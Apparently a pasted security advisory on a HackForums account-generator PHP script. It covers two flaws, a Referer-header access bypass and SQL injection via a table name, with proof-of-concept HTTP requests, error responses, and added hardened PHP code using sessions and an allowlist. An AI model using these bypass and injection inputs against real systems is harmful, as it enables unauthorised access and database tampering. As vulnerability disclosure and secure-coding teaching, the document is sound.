R007ME

HackForums FAG 2.0

Feb 19th, 2017
==============================================================================================
[-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities

[-] Author => DigiGang (digitalgangster@lelantos.org)

[-] Date Release => 22 August, 2016

[-] Vendor => HackForums, froy0z
Title => Free Account Generator 2.0
Thread Post => http://hackforums.net/showthread.php?tid=4882268
Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA
Vulnerable Version => 2.0
Tested Version => Latest, 2.0 on a Wamp Server
==============================================================================================


Vulnerability #1 : Using the generator without even registration or purchasing a membership.
Vuln File: /lib/generate.php
Vuln Code: Line 3-6

/*********************************************************************************
3. $pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST'));
4. if($pos===false){
5. die('No Access');
6. }
*********************************************************************************/

strpos checks whether HTTP_REFERER contains HTTP_HOST before generating data. Because the Referer header is supplied by the client, this makes it possible for anyone to use the generator by simply changing the Referer header.
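To show why the gate on lines 3-6 is not an access control and what a server-side replacement looks like, here is an added PHP example. It is not code from the FAG 2.0 release; it assumes the login/purchase flow stores the user's id in $_SESSION['user_id'] and an active-membership flag in $_SESSION['membership_active'] (the advisory does not show that code, so both names are assumptions).

```php
<?php
// Added example, not part of FAG 2.0: the original Referer gate from
// lib/generate.php beside a session-based replacement.
// Assumed session keys: $_SESSION['user_id'], $_SESSION['membership_active'].

// Original logic. getenv('HTTP_HOST') and $_SERVER['HTTP_HOST'] carry the same
// value under mod_php, so $server stands in for both here. strpos() succeeds
// when the host name appears anywhere inside the Referer string; both headers
// arrive from the client, so a passing check proves only that the client chose
// to send a Referer containing the host name.
function refererGateAllows(array $server): bool
{
    $referer = $server['HTTP_REFERER'] ?? '';
    $host    = $server['HTTP_HOST'] ?? '';
    return $host !== '' && strpos($referer, $host) !== false;
}

// Hardened logic: decide from server-side session state that only the
// login/purchase code path can set. The Referer header is not consulted.
function sessionGateAllows(array $session): bool
{
    return isset($session['user_id'])
        && (($session['membership_active'] ?? false) === true);
}

// Drop-in replacement for lines 3-6 of generate.php.
function requireMembership(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (!sessionGateAllows($_SESSION)) {
        http_response_code(403);
        die('No Access');
    }
}

// Self-check on constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    // Constructed request: Referer chosen by the client, nothing else proven.
    $spoofed = [
        'HTTP_HOST'    => 'localhost',
        'HTTP_REFERER' => 'http://localhost/lib/generate.php?generator=1',
    ];
    $checks = [
        'referer gate passes a client-chosen header'
            => refererGateAllows($spoofed) === true,
        'session gate rejects an anonymous request'
            => sessionGateAllows([]) === false,
        'session gate rejects a login without membership'
            => sessionGateAllows(['user_id' => 7]) === false,
        'session gate accepts an active member'
            => sessionGateAllows(['user_id' => 7, 'membership_active' => true]) === true,
    ];
    foreach ($checks as $name => $ok) {
        echo ($ok ? 'ok   ' : 'FAIL ') . $name . PHP_EOL;
    }
}
```

The point of the contrast is that the Referer is a client hint useful at most for CSRF heuristics, never for authorisation; the replacement ties access to state that only the server writes after a successful login and purchase.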

[-] Proof Of Concept [-]

http://localhost/lib/generate.php?generator=1

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1

Response:
No Access


[bypass]

http://localhost/lib/generate.php?generator=1

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1

Response:
test@account.com:123123


--------------------------------------------------------------------------------
Vulnerability #2 : SQL Injection
Vuln File: /lib/generate.php
Vuln Code: Line 10 & 34-40

/*********************************************************************************
10. $generator = mysqli_real_escape_string($con, $_GET['generator']);

34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con));
35. if(mysqli_num_rows($result) < 1){
36. exit("0 Accounts in stock");
37. }
38. while($row = mysqli_fetch_array($result)){
39. echo $row['alt'];
40. }
*********************************************************************************/

mysqli_query uses the 'generator' parameter directly in the SQL query, as part of the table name. Because the value is interpolated into a backtick-quoted identifier rather than a quoted string literal, mysqli_real_escape_string does not protect it (it escapes quotes and backslashes, not backticks or spaces), which makes it possible to interfere with the query and send malicious commands to the DBMS.
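Since an identifier cannot be bound as a prepared-statement parameter, the fix for lines 10 and 34 is to map the untrusted value onto an allowlist of known table names and build the query from the validated result. The following added PHP example is not code from FAG 2.0; the generator1..generatorN table layout, the `alt` and `status` columns and the $con mysqli connection follow the advisory, while KNOWN_GENERATORS and the constructed test inputs are assumptions.

```php
<?php
// Added example, not part of FAG 2.0: hardened replacement for the query
// construction on lines 10 and 34 of lib/generate.php.
// Assumption: the site offers exactly these generator ids; in the real
// application the list would come from configuration or a lookup table.
const KNOWN_GENERATORS = [1, 2, 3];

// Escaping (line 10 of the original) neutralises quotes and backslashes only,
// which is irrelevant when the value lands inside a backtick-quoted table
// name. The only safe option for an identifier is an allowlist: accept a
// plain decimal id, and build the table name from that integer, never from
// the raw request string.
function selectGeneratorTable(string $generator): ?string
{
    if (!ctype_digit($generator)) {      // rejects '', '1 3', '1`+TEST', '-1'
        return null;
    }
    $id = (int) $generator;
    if (!in_array($id, KNOWN_GENERATORS, true)) {
        return null;
    }
    return 'generator' . $id;
}

// Replacement for lines 34-40. The table name is trusted after validation;
// the status comparison is still bound as a parameter so no other part of
// the statement is assembled from strings.
function fetchRandomAccount(mysqli $con, ?string $generator): ?string
{
    $table = selectGeneratorTable($generator ?? '');
    if ($table === null) {
        http_response_code(400);
        return null;
    }
    $stmt = $con->prepare(
        "SELECT `alt` FROM `$table` WHERE `status` != ? ORDER BY RAND() LIMIT 1"
    );
    if ($stmt === false) {
        return null;
    }
    $inactive = '0';
    $stmt->bind_param('s', $inactive);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row['alt'] ?? null;
}

// Usage inside generate.php (after the membership check):
//   $alt = fetchRandomAccount($con, $_GET['generator'] ?? null);
//   if ($alt === null) { exit("0 Accounts in stock"); }
//   echo $alt;

// Self-check of the validator on constructed inputs, including the two
// values from the advisory's proof of concept. Runs without a database.
if (PHP_SAPI === 'cli') {
    $cases = [
        '1'       => 'generator1',
        '3'       => 'generator3',
        '1 3'     => null,   // PoC value: space breaks the identifier
        '1`+TEST' => null,   // PoC value: backtick closes the identifier
        '9'       => null,   // well-formed but not a known generator
        ''        => null,
    ];
    foreach ($cases as $input => $expected) {
        $ok = selectGeneratorTable((string) $input) === $expected;
        echo ($ok ? 'ok   ' : 'FAIL ') . var_export($input, true) . PHP_EOL;
    }
}
```

ctype_digit() accepts only ASCII digits, so anything that could alter the identifier is rejected before it is ever concatenated; the in_array() check with strict comparison then limits the query to tables the application actually owns. A request that fails validation gets a 400 rather than a MySQL error message, which also closes the error-based information leak seen in the advisory's responses.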

[-] Proof Of Concept [-]

http://localhost/lib/generate.php?generator=1+3
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1+3
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1

Response:
Table 'FAG_2sql1.generator1 3' doesn't exist


http://localhost/lib/generate.php?generator=1`+TEST
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1`+TEST
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1

Response:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1